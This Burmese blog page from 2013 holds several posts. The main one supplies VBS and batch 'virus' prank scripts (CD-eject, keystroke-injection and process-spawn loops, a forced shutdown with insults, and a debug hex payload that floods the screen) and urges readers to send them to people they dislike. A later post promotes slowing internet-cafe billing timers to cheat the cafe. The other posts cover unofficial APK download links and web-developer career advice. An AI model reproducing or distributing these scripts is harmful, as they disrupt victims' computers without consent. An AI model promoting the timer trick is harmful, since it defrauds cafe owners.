Thursday 31 January 2013

ဗိုင်းရပ်စ် ကုဒ် အချို့ 

ကဲ သူငယ်ချင်းတို့ကို မိမိနဲ့မျက်နှာကြောမတဲ့တဲ့သူတွေကို နှိပ်စက်ဖို့ နည်းကောင်းလေးတွေရှယ်ပေးမယ်…
ကျွန်တော်လည်းအခုတလော ပျင်းနေတာနဲ့ ဟိုအရင်တွေ ဘယ်အချိန်လောက်က burn ထားတဲ့အခွေတွေ
လဲ မမှတ်မိတော့ပါဘူး…အဲဒီခွေတွေလျှောက်ဖွရင်းတွေ့မိလို့.. ဘယ်ဆိုဒ်က ကူးထားလည်းဆိုတာလည်း
မမှတ်မိတော့ဘူး သက်ဆိုင်သူမူရင်းပိုင်ရှင်အနေနဲ့ နားလည်ခွင့်လွတ်နိုင်မယ်လို့ မျော်လင့်ပါတယ်…
အခုကျွန်တော် ပေးတဲ့နည်းလေးတွေကို သူငယ်ချင်းတွေကို နောက်ရုံပဲလုပ်စေချင်ပါတယ်…….
ဘယ်လိုပဲဖြစ်ဖြစ် နည်းပညာတစ်ခုကိုမျှဝေတယ်လို့ပဲသဘောထားပါနော်…..ကဲစလိုက်ကြရအောင်….
ပထမဦးဆုံး မိမိစက်  Deskot လွတ်တဲ့နေရာမှာ right click ထောက်လိုက်ပြီး new> tex document
ရွေးချယ်လိုက်ပါ…..တစ်နည်းအားဖြင့် notepad ဖွင့်လိုက်တာပေါ့ဗျာ….
အဲဒီထဲမှာ အခုကျွန်တော်ဖော်ပြထားတဲ့ကုတ်တွေကို ကူးထည့်ပြီး သပ်မှတ်ထားသလို save လုပ်ပေးပါ…
အဲဒီကနေရရှိလာတဲ့ဖိုင်လေးတွေကို run ပေးလိုက်ပေါ့ဗျာ…ပျော်စရာ virus လေးတွေအစွမ်းပြကြပါလိမ့်မယ်….



DVD အဖုန်းကိုတောက်လျှောက်ဖွင့်လိုက်ပိတ်လိုက်လုပ်ပေးသောကုတ်…
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

ဒီဟာလေးကို ( .vbs) နဲ့ဆေ့ပါ
Vbs နဲ့ save ဆိုတာက မိမိပြုလုပ်လိုက်တဲ့ ဥပမာဗျာ ဒီဗိုင်းရပ်စ်ကို dvd လို့နာမည်ပေးရင် dvd.vbs လို့နာမည်ပေးရမှာပါ…..အောက်က save as file type မှာတော့ all files ဆိုတာကိုရွေးပေးထားပါ…
အဲလောက်ဆိုသဘောပေါက်မှာပါ…..

2) Caps Lock ကိုဆက်တိုက်ဖွင့်လိုက်ပိတ်လိုက်လုပ်နေသောကုတ်


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

ဒီဟာလေးကို ( .vbs) နဲ့ဆေ့ပါ
3) ဒါလေးကသင့်ကွန်ပြူတာကို မက်ဆေ့ ပေးပြီး shutdown ကျသွားစေသောကုတ်
code:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" –s
ဒီဟာလေးကို ( .bat) နဲ့ဆေ့ပါ
4) Enter key ကိုဆက်တိုက်နှိပ်ပေးနေသောကုတ်
code :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

ဒီဟာလေးကို ( .vbs) နဲ့ဆေ့ပါ.
5) CMD နဲ့ Notepad တွေရပ်မရအောင်ဆက်တိုက်ဖွင့်တာလေးပါ။
code:
@echo off
:A
start cmd
start notepad
goto :A


ဒီဟာလေးကို ( .bat) နဲ့ဆေ့ပါ..

6) Backspace တိုက်ပွင့်နေမှာပါ။သင်စာရိုက်လို့မရပါ။
code :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

ဒီဟာလေးကို ( .vbs) နဲ့ဆေ့ပါ
7) သင့် keyboard လေးကိုဟက်ပြီး သင်ဟာအရူးဆိုပြီးသင်စာရိုက်တိုင်းပေါ်နေမှာပါ။
  code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

ဒီဟာလေးကို ( .vbs) နဲ့ဆေ့ပါ

8. Notepad ကိုဆက်တိုက်ပွင့်နေမှာပါ။
  code:

@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
ဒီဟာလေးကို ( .bat) နဲ့ဆေ့ပါ
10) Lighting .bat

သင့် မော်နီတာဟာဘာမှ မမြင်ရပဲ လင်းလက်နေတဲ့ ဖန်သားပြင်ပဲမြင်နေရမဲ့ကုတ်

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug <z.dbg>nul
del z.dbg

သင်ပြန်ထွက်ချင်ရင် CTRL-ALT-DELETE နဲ့ပြန်ထွက်လိုက်ပါ။
အောက်ကကုတ်ဆိုရင် အဲဒါနဲ့မရပါ။ctrl+shirt+esc နဲံ့ရမယ်။
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug <z.dbg>nul
del z.dbg
goto a
အဲဒါလေးတွေကတော့ bat ဖိုင်နဲ့ဆေ့ပေးရမယ်…

ဒါလေးကတော့ ပျော်စ၇ာ message Box လေးလုပ်ဖို့အတွက်
အရင်ဆုံး Notepad တစ်ခုကို ဖွင့်ပြီး အောက်ကအတိုင်း ရေးလိုက်ပါ။

သင်္ကေတ:

msg = msgbox ("Do you like beer?" ,32+3, "Funny Message")

ပြီးရင် FileName.VBS နဲ့  Save လိုက်ပါ။
အဲဒါလေးကို run လိုက်ရင် မင်း ဘီယာကြိုက်သလားဆိုတဲ့ ? လေးနဲ့ message box လေးကျလာပါလိမ့်မယ်…..
Do You Like beer ? ကတော့ ရိုက်လိုတဲ့ Message ပါ။ 32+3 ဆိုတာတော့ Message Box မှာ ပါရှိမဲ့ Icon ပုံလေးနဲ့  Button
အတွက်ပါ။ Funny Message ကတော့ Message Box ရဲ့ Title ပါ။ အဲဒီနေရာတွေမှာ ရိုက်ချင်တာလေးတွေ ရိုက်ပါ။
ဒီအောက်က bottom လေးတွေနဲ့ message box ပုံစံလေးတွေကို မိမိနှစ်သက်သလို လည်သလိုတွဲဖက်အသုံးပြုလို့ရပါတယ်…
Button တွေနဲ့  Icon တွေအတွက် နံပါတ်
တွေကိုတော့ အောက်မှာ ကြည့်ပါ။

0 - သူကတော့ OK Button တစ်ခုတည်းအတွက်ပါ။
1 - သူကတော့ OK နဲ့  Cancel Button အတွက်ပါ။
2 - သူကတော့ Abort , Retry နဲ့  Ingnore အတွက်ပါ။
3 - သူကတော့ Yes , No နဲ့  Cancel Button အတွက်ပါ။
4 - သူကတော့ Yes နဲ့  No အတွက်ပါ။
5 - သူကတော့ Retry နဲ့  Cancel အတွက်ပါ။
16 - သူကတော့ Critical Message Icon အတွက်ပါ။
32 - သူကတော့ Warning Query Icon အတွက်ပါ။
48 - သူကတော့ Warning Message Icon အတွက်ပါ။
64 - သူကတော့ Information Icon အတွက်ပါ။

Icon နဲ့  Button ကို အပေါင်းခံပြီး ရေးနိုင်ပါတယ်။
တစ်ကယ်လို့ message box ထဲမှာ မြန်မာလိုပေါ်စေချင်တာဆိုရင်လည်း မြန်မာလိုအစားထိုးရေးနိုင်ပါတယ်….
Notepad မှာမြန်မာလိုရိုက်ရအောင်ပြောင်းတာတော့သိကြမှာပါနော်…ဒါပေမဲ့ မြန်မာလိုရေးရင် save လုပ်ရာမှာ
Encoding ဆိုတဲ့အကွက်မှာ unicode ဆိုတာကိုရွေးပေးထားရပါတယ်…..
ကဲ အမြန်ဆုံးလုပ်ပြီး အမြင်ကပ်သူများကို လက်ဆောင်အဖြစ် လည်သလိုပို့ကြပေတော့……..

source-ဧဒင်ဥယျာဉ်

နာရီအလန်းလေးပါ



desktop ပေါ်မှာထားဖို့ နာရီအလန်းလေးပါ အလန်းတကာအလန်း alarm လည်းပေးထားလို့ ရတယ်နော်


ဒီမှာ မှာဒေါင်းလုဒ်ဆွဲလိုက်ပါ

portable yahoo messenger

yahoo messeenger portable လေးပါ   


ဒီမှာ   ဒေါင်းပါ ပြီးရင် ဇစ်ဖိုင်ဖြည်လိုက်ပါ အဲမှာ Yahoo! Messenger ဆိုတဲ့ဖိုဒါလေးတွေ့ ပါလိမ့်မယ် အဲ့ဖိုဒါလေးကို ဖွင့်ပြီး အထဲကဖိုင်တွေကို local disc ထဲက program ဆိုတဲ့ဖိုင်ထဲကိုကုထည့်လိုက်ပါ ဒါဆို စောစောကဖြည်လိုက်တဲ့ဇစ်ဖိုင်ထဲက yahoo messenger ကိုကလစ်ပြီးဖွင့်ပြီး အကောင့်နဲ့ ပတ်စ်ဝက်ရိုက်ထည့်ပြီး အသုံးပြုနိုင်ပါပြီခဗျာင်္။ ။

network ချိတ်ဆက်နည်း







beginner တွေအတွက်network ချိတ်ဆက်နည်း စာအုပ်လေးတင်ပေးလိုက်ပါတယ်
ဒီမှာ ဒေါင်းလုဒ်ဆွဲပါ

java programming စာအုပ်




java programming စာအုပ်လေးပါ
လေ့လာချင်တဲ့သူတွေမသွားလိုက်ပါဗျာ ဒီမှာပါ

ဖိုရမ်ထဲမှာပဲဖြစ်ဖြစ်မွေးနေ့ လက်ဆောင်ပေးရန် flash လေးများ







ဒါလေးတွေကိုလိုချင်တယ်ဆိုရင်တော့ဖြင့်   ဒီကို        သွားလိုက်ပါဗျာ

mp3 to ringtone creator



mp3 ကိုလိုချင်တဲ့နေရာကနေဖြတ်တောက်ပြီး စိတ်ကြိုက် ringtone လုပ်ချင်တဲ့သူများအတွက် 
mp3 to ringtone creator လေးကိုတင်ပေးလိုက်ပါတယ် fullversion လေးပါ
အသုံးပြုရတာလည်းလွယ်ကူလို့ ထပ်ပြီးပြောမနေတော့ပါဘူးနော်ဒီမှာ ပဲဒေါင်းလုဒ်ဆွဲလိုက်ပါ။

speeder software

speeder software ဆိုတာကတော့ ကွန်ပျူတာထဲမှာ run ထားသမျှ application တွေကို
စိတ်ကြိုက်မြန်ချင်မြန် နှေးချင်နှေးလုပ်လို့ ရတဲ့ဆော့ဝဲလ်လေးပါ

သုံးတက်ရင်တော်တော်လေးအသုံးတည့်ပါတယ် အင်တာနက်ဆိုင်မှာထိုင်သုံးတဲ့ဘော်ဘော်
တွေအတွက်ကတော့ speeder software လေးကိုအင်စတောပြီး target ဆိုတဲ့bottom လေးကိုနှိပ်
Cafezee ကိုနှေး Handy Cafe ဆိုလည်း Handy Cafe ကိုနှေး ဒီတော့မိနစ်တွေတော်ရုံတန်ရုံသိပ်မသွားနိုင်
ပြီမို့ အကြာကြီးထိုင်လို့ ရတာပေါ့ဗျာ တစ်နာရီကို တစ်နာရီခွဲလောက်ကြာသွားအောင်နှေးထားပေါ့နော့်။
ဒါမှမဟုက်လည်း စက်ကိုမြန် gtalk ကိုမြန် internet browser ကိုမြန် ။မြန်ချင်တာကိုမြန်ပြီးတော့လုပ်ချင်တာသာလုပ်ပါတော့ဗျာ။ဒီမှာ မှာဒေါင်းလုဒ်ဆွဲလိုက်ပါ။

အင်္ဂလိပ်-မြန်မာ online dictionary

အင်္ဂလိပ်-မြန်မာ  dictionary လေးပါ။ online ပေါ်ကနေအလွယ်တကူဘာသာပြန်လို့ ရတော့ဘာပဲဖြစ်ဖြစ်အေးတာပေါ့ဗျာ။
ဟုက်တယ်မဟုက်လား ဒီကို သွားပါ။

ပါဝင်တဲ့ စာလုံးအရေအတွက်ကတော့အောက်ပါအတိုင်းဖြစ်ပါတယ်။
Total English To Myanmar Word : 37408             
Total Myanmar To English Word : 62598

GTC ကကောင်မလေးကိုမှချစ်မိနေသူကိုကိုတို့ အတွက်

ဟဲဟဲ ခေါင်းစဉ်လေးဖတ်ပြီးစိတ်ဝင်စားသွားကြပြီနဲ့ တူပါတယ်။ ဟုက်ပါတယ်ဗျာ GTC ကကောင်မလေးကိုမှ ချစ်နေမိတဲ့ကိုကိုတို့ အတွက် GTC ကကောင်မလေး လို့ ခေါ်တဲ့သီချင်းလေး
တင်ပေးလိုက်ပါတယ်ဗျာ ဒီမှာ ဒေါင်းလုဒ်ဆွဲသွားကြပါခဗျာင်္။          ။

Social Media Icons Widget Library

လိုချင်တယ်ဆိုရင် ဒီမှာ မှာဒေါင်းပါ

Warcraft themes အလန်းများ

တစ်ကယ့် themes အလှလေးတွေပါ လိုချင်တယ်ဆိုရင်  ဒီမှာပါ ကြိုက်မယ်လို့မျှော်လင့်ပါတယ် ကျေးဇူးတင်ပါတယ်ခဗျာင်္။

ဝါသနာပါရင် ဗေဒင်မေးမယ် ယတြာချေမယ်

ကဲ .. အပြင်းပြေပဲဖြစ်ဖြစ် .. ယုံကြည်လို့ပဲဖြစ်ဖြစ် ဗေဒင်မေးချင်တဲ့သူငယ်ချင်းတွေအတွက်


Facebookမှာလည်း တောင်းနေတာတွေ့လို့
 ဗေဒင်မေးလို့ရတဲ့ ဆော့ဝဲလေး တင်ပေးလိုက်ပါတယ်

 ဒီဆော့ဝဲလေးက Install လုပ်စရာမလိုပဲ Double Click နှိပ်ပြီး Run လိုက်ရုံပါပဲ .. ဘာပဲပြောပြော ဗေဒင်မေးခတော့ သက်သာတာပေါ့နော်




ကဲ .. လိုချင်တဲ့သူငယ်ချင်းများ အောက်မှာ ဒေါင်းယူလိုက်ပါဗျာ


ဒေါင်းပြီးပြီဆိုရင်တော့ ဒေါင်းလို့ရလာတဲ့ဖိုင်ကိုဖြည်လိုက်ရင်
အထဲမှာ ဗေဒင်ဆိုတဲ့ Application ဖိုင်လေးကို Double Click ပြီး Run လိုက်ပါ
အောက်ကပုံအတိုင်းကျလာပါမယ် ..



အဲဒီထဲမှာ ကိုယ့်ရဲ့နံမည်ကို ရိုက်ထည့်ပြီး Go ကို နှိပ်ပေးလိုက်ပါ
ကျန်တာတွေကတော့ သူညွှန်ကြားထားတဲ့အတိုင်းပဲ
နှစ်သက်ရာဖဲတစ်ချပ်ကို ရွေးပေးလိုက်ပါ ..

 အဲဒီဖဲချပ်ရဲ့အဖြေကိုသိဖို့ အဲဒီဖဲချပ်ပုံကို ကလစ်လိုက်တာနဲ့
သက်ဆိုင်ရာအဟောတွေ ပေါ်လာပါမယ် ..
အောက်ကပုံအတိုင်းကျလာပါမယ် ..




အခြေအနေမကောင်းလို့ ယတြာလေးဘာလေး ချေချင်တယ်ဆိုရင်တော့
ယတြာဆိုတာလေးကို နှိပ်ပေးလိုက်ပါ ..


ကျွန်တော်တော့ ဒီပို့စ်လေးအတွက် စမ်းသုံးပြရင်း မြင်ကြတဲ့အတိုင်း
အခြေအနေသိပ်မကောင်းလို့ .. ညစ်သွားပြီ ..

ကဲ .. သိန်း ၁၅၀၀ ဆုကို လစဉ်ပေါက် .. အိမ်ထောင်တွေအခေါက်ခေါက်ကျပြီး
အားရအောင်ကဲပြီးသကာလ နိဗ္ဗာန်ရောက်နိုင်ကြပါစေဗျာ .. :D

ဒီပို့ စ်ကတော့ နည်းပညာလမ်းကြောင်းပေါ်ကသူငယ်ချင်းအားလုံးကို လေးစားခင်မင်လျှက်ရှိတဲ့
ကိုအိုင်တီမုဆိုးဆီက မလာတာပါ။

Facebook နှင့် Gmail နောက်ဆုံးထွက် Update Version(For Android) (For Android)

Android ဖုန်းတွေမှာ ဖေ့ဘွတ်ပဲဖြစ်ဖြစ် ဂျီမေးလ်ပဲ ဖြစ်ဖြစ် ဘရိုဇာ တွေက ဝင်သုံးတဲ့အခါ မြန်မာလို ဖတ်ရတာ ကမောက်ကမ ဖြစ်တတ်ပါတယ်။ဘာကြောင့်လဲ ဆိုတာတော့ ကျွန်တော်လည်း မရှင်းပြတတ်ပါ။ ဒါပေမဲ့ ဖေ့ဘွတ် အိုင်ကွန် တွေ ဂျီမေးလ် အိုင်ကွန်တွေကနေ ဝင်သုံးတဲ့အခါ မြန်မာလို ဖတ်ရတာ အဆင်ပြေပါတယ်။


ကျွန်တော် sony xperia 8 ရယ် ဆမ်ဆောင်း ဂလက်ဆီ အက်စ် ရယ် ဂလက်ဆီဝိုင် ရယ်မှာလည်း စမ်းကြည့်ပြီးပါပြီ။ဘရိုဇာတွေ ကနေ ဝင်ကြည့်ရင် ကမောက်ကမ ဖြစ်ပါတယ် မြန်မာစာတွေက.....တွေးမိတာကတော့ သုံးထားတဲ့ ဖောင့်ချင်းမတူလို့  ထင်ပါတယ်။ ကျွန်တော်လည်း ဖုန်းအကြောင်း သိပ်နားမလည်ပါဖူး။ရေးတာ မှားရင် နားလည်ခွင့်လွှတ်ပါ။
ကျွန်တော်ကတော့ ဖေ့ဘွတ် shortcut တွေကပဲ သုံးတော့ ဖတ်ရတာ အဆင်ပြေပါတယ်။ shortcut တွေက ပဲ သုံးပါ မြန်မာဖောင့်ဖတ်ရတာအဆင်ပြေစေချင်ရင်......

ကျွန်တော် အခုသုံးနေတဲ့ ဖေ့ဘွတ် နှင့် ဂျီမေးလ် နောက်ဆုံးထွက် ဗားရှင်းလေးတွေကို လိုအပ်ခဲ့လျှင် အောက်ကလင့်တွေက သွားပြီး ဒေါင်းပါ။

ဖေ့ဘွတ် နောက်ဆုံးထွက် Update Version ကို ဒေါင်းရန်-
https://www.dropbox.com/s/bhlmzongs25s6mx/facebook.apk

ဂျီမေးလ် နောက်ဆုံးထွက် Update Version ကို ဒေါင်းရန်-
https://www.dropbox.com/s/es5gy4es80y2dhv/gmail.apk

ဒေါင်းမရရင်ကွန်မက်ချန်ခဲ့ပေးပါ

အဆင်ပြေပါစေ။

avast! Mobile Security 2.0.3587 (for android)


android ဖုန်းတွေ အတွက် ဗိုင်းရပ်သတ်တဲ့ ဆော့ဝဲလ်ကောင်းလေးတစ်ခုပါ။Update လေးထွက်လာလို့  တင်ပေးလိုက်ပါတယ်။

January 29, 2013 က Update ထွက်တာပါ။
Version က 2.0.3587 ပါ။
အသုံးပြုနိုင်မဲ့ Android ဖုန်းအမျိုးအစားက 2.1 and up

လိုအပ်ခဲ့လျှင် အောက်ကလင့်လေးကနေသွားပြီး ဒေါင်းလိုက်ပါ။

https://www.dropbox.com/s/u0xl6lx78pqm620/avast!%20Mobile%20Security_2.0.3587.apk

Tango Text, Voice, Video Calls



Android သမားတွေသိပြီးသားပါ ။ Tango ဆော့ဝဲလ် ကို ဗွီဒီယို call ခေါ်လို့ ရတယ် ဖုန်း call လို့ ရတယ် ဗွီဒီယို Call ခေါ်ရင်းနဲ့  ဂိမ်းဆော့လို့ ရတယ်။ အခု နောက်ဆုံးထွက်လာတဲ့ ဆော့ဝဲလ် Update လေးမှာ နောက်ထပ် Function တစ်ခု ထပ်တိုးလာတယ်။ ဘာလဲ ဆိုတာကတော့ ဒေါင်းပြီးတော့သာ ကြည့်ကြပါ :P


January 8, 2013 ကထွက်တာပါ ဒီဆော့ဝဲလ် Update လေးက။
Current Version က  2.5.35414 ပါ။
လိုအပ်တဲ့ Android ဖုန်း Version က 2.2 and up

PC ရယ် I phone ရယ် Window ဖုန်းရယ် အတွက် ကတော့ မူရင်းဝက်ဆိုဒ်ဖြစ်တဲ့ http://www.tango.me/ မှာ သွားပြီးဒေါင်းလိုက်ပါ။

PC မှာ ဆော့ဝဲလ် ဒေါင်းနည်း နဲ့  အသုံးပြု နည်း ကတော့ ကျွန်တော့်ဆိုဒ်လေးမှာတင်ထားပြီးသားပါ။အောက်ကလင့်လေးကသွားပြီး ကြည့်ပေးပါ။

http://toobigg02.blogspot.com/2012/08/tango-software-for-pclaptop-and-mobile.html

Android ဖုန်းတွေ အတွက်ကတော့ အောက်ကလင့်က သွားပြီး ဒေါင်းလိုက်ပါ။

https://www.dropbox.com/s/haaotdd9elhywld/tango.apk

အဆင်ပြေကြပါစေ။

ကျွန်တော့်ဆိုဒ်မှာ ဝင်ရောက်ကူညီ ရေးသားပေးနေတဲ့ ဘလော့ဂါ အသစ် ညီလေး ကျော်ဇင်ဟိန်း နှင့် မိတ်ဆက်ပေးခြင်း

သူငယ်ချင်းများ အားလုံးပဲ မင်္ဂလာပါ ။

ဒီနေ့  ကျွန်တော် ဆိုဒ်လေးမှာ ကျွန်တော် နှင့် အတူတကွ ပါဝင်ရေးသားပေးဖို့  ညီလေး တစ်ယောက် ကိုဖိတ်ခေါ်ခဲ့ပါတယ်။ အဲ့ ညီလေးရဲ့ နာမည်က ကျော်ဇင်ဟိန်း ပါ။ (ကျွန်တော်နဲ့ နာမည်တူတယ်နော် :)  )

ဒီနေ့ ကစပြီး ညီလေး ကျော်ဇင်ဟိန်း က ပို့ စ်တွေကို ပါဝင်ရေးသား တင်နေပါပြီ။

အများကြီးတော့ မပြောတော့ပါဖူး(မပြောတတ်လို့  )

ကြိုဆိုပါတယ် ညီလေး ကျော်ဇင်ဟိန်း ရေ ........ကျေးဇူးလည်းတင်ပါတယ်။
 

web developer တယောက်အဖြစ် လုပ်ငန်းခွင်ဝင်ဖို့ ဘာတွေကိုဘယ်လောက် ပမာဏအထိ တတ်သိထားဖို့ လိုအပ်ပါသလဲ ??


Programming language တခုကိုကျွမ်းကျင်ပြီလို့ ပြောနိုင်ဖို့အတွက် အဲဒီ language ရဲ့ ဘယ်လောက်ရာခိုင်နှုံးအထိ

သိရှိမှတ်မိနေဖို့လိုအပ်ပါသလဲ ??

web developer တယောက်အဖြစ် လုပ်ငန်းခွင်ဝင်ဖို့ ဘာတွေကိုဘယ်လောက်ပမာဏအထိ တတ်သိထားဖို့လိုအပ်ပါသလဲ ??

စတဲ့မေးခွန်းလေးတွေဖြစ်ပါတယ်။ အရင်ကလဲဒီကိစ္စအကြောင်းကို မကြာမကြာပြောခဲ့ဖူးပါတယ်။ကျနော်ကိုယ်တိုင်လဲ ဒီအဆင့်

တခုကိုဖြတ်သန်းခဲ့ဖူးတဲ့အတွက် လေ့လာဆဲ programmer တွေကိုကိုယ်ချင်းစာပါတယ်။ဒါကြောင့် ကျနော်သိရှိနားလည်ထားသလို

ထပ်ပြောပေးပါအုံးမယ်။


အများအားဖြင့် ပထမမေးခွန်းဟာ language တခုကိုလေ့လာနေပြီး အဲဒီ language ကို တလုံးမကျန်မှတ်မိနေအောင်လုပ်ဖို့လိုအပ်သလား၊

မလိုအပ်ဘူးလား ဝေခွဲမရဖြစ်နေသူတွေမေးကြတာပါ။တတ်ကျွမ်းအောင်လုပ်နိုင်ရင်ကောင်းမှန်းတော့ လူတိုင်းသိပါတယ်။ဒါပေမယ့်

အမှန်တကယ်ရောလိုအပ်လို့လား သံသယရှိနေတယ်။တဖက်ကလဲ သိအောင်မလုပ်မိရင် နောက်ကျများကျန်ခဲ့မလား စိုးရိမ်နေတယ် စသဖြင့်

ဒွိဟတွေပွားတက်ကြတာ ထုံးစံပါပဲ။


မေးခွန်းကိုတိုက်ရိုက်မဖြေခင် ကနေ့ခေတ် professional web developer တယောက်အဖြစ်ရပ်တည်လုပ်ကိုင်နေသူတွေ သိထားလေ့ရှိတဲ့

နည်းပညာတွေကို ခေါင်းထဲပေါ်လာသလောက် ဖော်ပြပေးချင်တယ်။ အဲဒါတွေကတော့.........

    * Web standards – HTML/CSS/Javascript/HTTP, etc..
    * Web2.0 technologies – REST/JSON/Ajax, etc..
    * Modern web technologies – HTML5/Websocket/Node.JS, etc..
    * Server Side Technology – PHP/.NET/ Rails, etc..
    * Pattern and Paradigms – OOP/MVC, etc…
    * Tools and Libraries – jQuery/CMSs, etc..
    * Database – MySQL/MSSQL/MongoDB, etc..
    * Basic workflow – Unit testing/SCM, etc..

ဒါတွေအပြင် နေ့စဉ်နဲ့အမျှ တိုးတက်ပေါ်ပေါက်နေတဲ့ နည်းပညာတွေကိုလဲ စဉ်ဆက်မပြတ် အမှီလိုက်နေနိုင်ဖို့လဲလိုအပ်ပါတယ်။

ဒါကြောင့် ပထမဆုံးသတိပြုရမှာက programming language ဆိုတာ လိုအပ်ချက်တွေထဲက အစိတ်အပိုင်းလေးတခုမျှသာဖြစ်

တယ်ဆိုတဲ့ အချက်ပဲဖြစ်ပါတယ်။ဒုတိယအချက်အနေနဲ့သတိပြုရမှာက အားလုံးကိုတလုံးမကျန်မှတ်မိနေဖို့မလိုအပ်ဘူးဆိုတဲ့ အချက်ပဲဖြစ်ပါတယ်။

ဒီလောက်များပြားလှတဲ့ နည်းပညာတွေကိုလဲ ဘယ်သူမှ တလုံးမကျန်သိမနေနိုင်ပါဘူး။အချိန်မရွေးရှာဖွေကိုးကားလို့ရတဲ့ Internet ရှိနေတဲ့အတွက်

လိုလဲမလိုအပ်ပါဘူး။ကိုယ့်ရဲ့ လက်တွေ့လုပ်ကိုင်မှု ပမာဏပေါ်မူတည်ပြီး အချို့ကိုယ်တော့ အလိုလိုမှတ်မိနေပါလိမ့်မယ်။

တတိယအချက်အနေနဲ့ သတိပြုရမှာက နည်းပညာတွေရဲ့ သဘောတရားကို နားလည်နေဖို့ကသာ အဓိကဖြစ်တယ်ဆိုတဲ့ အချက်ပါပဲ။

သဘောတရားနားမလညရင် Internet လဲ အလကားပါပဲ။မေးခွန်းနားမလည်တဲ့ စာဖြေကျောင်းသားလိုဖြစ်နေပါလိမ့်မယ်။

ကူးပေတော့ဆိုပြီး စာအုပ်ချပေးလဲ ဘယ်စာမျက်နှာကိုလှန်ပြီး ဘာကိုကူးရမှန်းမသိဖြစ်နေမှာပါ။ဒါကြောင့်အခုချိန်ကစပြီး

အားလုံးကိုမှတ်မိနေဖို့ကြိုးစားနေတာကိုရပ်ပြီး ဆိုင်ရာနည်းပညာရဲ့ အခြေခံသဘောတရားကို သိရှိနားလည်အောင်လုပ်ဖို့လိုအပ်ပါတယ်။

ဒါဟာ language သိရှိမှတ်မိမှုကိုအရေးကြီးတယ်လို့ လွဲမှားမှတ်သားမိမှာစိုးလို့ပြောတာပါ။
How Much Do I Need to Know?

မူလမေးခွန်းဖြစ်တဲ့ "ကျွမ်းကျင်ပြီလို့ပြောနိုင်ဖို့အတွက် language ရဲ့ ဘယ်လောက်ရာခိုင်နှုံးအထိ သိရှိထားဖို့လိုအပ်သလဲ"

ဆိုတဲ့မေးခွန်းကိုတိုက်ရိုက်ဖြေရရင်တော့ အဲဒီ language ကိုသုံးပြီး ကိုယ်လိုရင်တဲ့ရလဒ် (software,website,product)

ဖန်တီးနိုင်ပြီဆိုရင် ကျွမ်းကျင်ပြီင်္လို့ပြောနိုင်ပါတယ်။ဥပမာ language မှာ built in function 5000 ကျော်ပါတယ်။ကိုယ်က

50 လောက်ကိုပဲသုံးပြီး လိုချင်တဲ့ ရလဒ်ကိုဖန်တီးနိုင်တယ်ဆိုရင်လဲ ကျွမ်းကျင်ပြီလို့ပြောနိုင်ပါတယ်။ကျန်နေတဲ့ 4500 ထဲမှာ

ပိုကောင်းတဲ့နည်းတွေ၊ပိုထိရောက်တဲ့နည်းတွေရှိကောင်းရှိနေအုံးမှာပါပဲ။ဒါပေမယ့် အဲဒါက အတွေ့အကြုံကပေးမယ့်

ကျွမ်းကျင်မှုဖြစ်ပါတယ်။လုပ်ရင်းနဲ့မှသိလာမယ့်နည်းလမ်းတွေပါ။အဲဒါတွေသိမှစလုပ်မယ်ဆိုရင်တော့

ဒီတသက်လုပ်ဖြစ်မှာမဟုတ်တော့ပါဘူး။
When Am I Ready?

ဒုတိယမေးခွန်းဖြစ်တဲ့ " web developer တယောက်အဖြစ် လုပ်ငန်းခွင်ဝင်ဖို့ ဘာတွေကိုဘယ်လောက်ပမာဏအထိ

တတ်သိထားဖို့လိုအပ်သလဲ " ဆိုတဲ့မေးခွန်းအတွက် ဆက်ပြောပါမယ်။ပထမဆုံးလိုအပ်တာက အထက်မှာဖော်ပြထားတဲ့

နည်းပညာတွေရှိနေတယ်။အဲဒါတွေကိုသိထားဖို့လိုအပ်တယ်ဆိုတဲ့ အသိဖြစ်ပါတယ်။ဒါပေမယ့် အဲဒါတွေတခုမကျန်သိမှ

လုပ်ငန်းခွင်ဝင်ဖို့ဖြစ်မယ်ဆိုတဲ့သဘော လုံးဝမဟုတ်ပါဘူး။programming language ဆိုတာ အစိတ်အပိုင်းလေးတခုမျှ

သာဖြစ်တယ်လို့ပြောခဲ့ပြီးပါပြီ။ဒါပေမယ့် အဲဒီအစိတ်အပိုင်းလေးကိုပဲ သဘောတရားနားလည်ပြီး လိုအပ်သလို ကိုးကား

အသုံးချနိုင်ပြီဆိုရင် လုပ်ငန်းခွင်ဝင်ဖို့ အသင့်ဖြစ်ပါပြီ။html,css ပဲတတ်ပါတယ်ဆိုလဲ လုပ်ငန်းခွင်ဝင်နိုင်တာပါပဲ။

wordpress ပဲသုံးတတ်တယ်ဆိုလဲ လုပ်ငန်းခွင်ဝင်နိုင်တာပါပဲ။

